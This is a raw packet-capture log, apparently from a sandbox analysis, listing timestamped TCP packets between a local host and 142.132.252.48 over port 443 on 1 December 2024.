                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123843908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123859882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.129021883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.129050016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.129121065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.129132986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.129143953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.130639076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.139517069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.139545918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.139632940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.139640093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.139648914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.140646935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.145265102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.145283937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.145345926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.145353079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.147417068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.151088953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.151119947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.151150942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.151163101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.151176929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.152661085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.155909061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.155935049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.155992031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.156003952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.156044960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.156651974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161533117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161554098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161622047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161638021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161673069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.161673069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.167202950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.167227030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.167290926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.167290926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.167305946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.168683052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.324970961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.324999094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.325129986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.325144053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.325212955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.330159903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.330180883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.330282927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.330300093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.332679033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.340783119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.340805054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.340914965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.340924978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.344649076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.346493959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.346524954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.346611977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.346627951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.348656893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352134943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352170944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352229118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352235079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352267981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.352691889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.358187914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.358211994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.358386040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.358392954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.358437061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.362793922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.362814903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.362898111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.362905025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.362957954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.366463900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368432045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368463993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368521929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368529081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368544102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.368591070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.422631979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526407003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526444912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526527882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526545048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526566029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.526606083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531455994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531478882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531554937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531565905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531605959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.531605959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542119026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542159081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542236090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542244911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542279005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.542279005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547775030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547805071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547869921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547877073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547887087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.547930002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553447008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553474903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553550959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553550959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553560019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.553595066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559108973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559135914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559221029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559221029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559231997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.559328079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564291000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564313889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564373970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564382076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564393997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.564429998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.569849968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.569870949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.569957018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.569967031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.570005894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.577429056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727813959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727863073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727901936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727921963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727968931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.727968931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733409882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733436108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733480930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733489990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733531952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.733531952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.744529963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.744550943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.744632959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.744642973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.744690895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.748987913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.749007940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.749064922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.749073982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.749090910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.749105930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.754743099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.754760981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.754810095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.754817009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.754856110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.760612011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.760632038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.760710955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.760725975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.760771036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765309095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765327930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765383005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765389919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765419960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.765482903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771182060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771203041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771251917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771260023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771286011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.771302938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.861112118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928829908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928864002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928950071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928950071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928961039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.928998947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934645891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934673071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934717894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934726000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934766054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.934766054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945522070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945544958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945600986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945609093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945633888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.945652008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950265884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950292110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950337887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950345039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950356960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.950406075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.956041098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.956058979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.956142902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.956156015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.956207037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961605072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961626053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961668015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961678982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961716890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.961740971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.966696024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.966722965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.966754913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.966761112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.966798067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972280979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972305059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972376108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972387075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972400904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.972436905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.033171892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.130662918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.130692005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.130795956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.130795956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.130806923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.131052971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136133909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136161089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136238098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136238098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136248112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.136332989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.146500111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.146522045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.146631956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.146641970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.146692991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151492119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151520014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151568890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151581049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151598930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.151648045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157228947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157249928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157300949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157310009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157321930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.157390118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.162954092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.162981033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.163039923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.163044930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.163063049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.163111925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168580055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168603897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168653965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168661118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168677092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.168731928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173563004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173585892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173629045 CET49721443192.168.2.6142.132.252.48
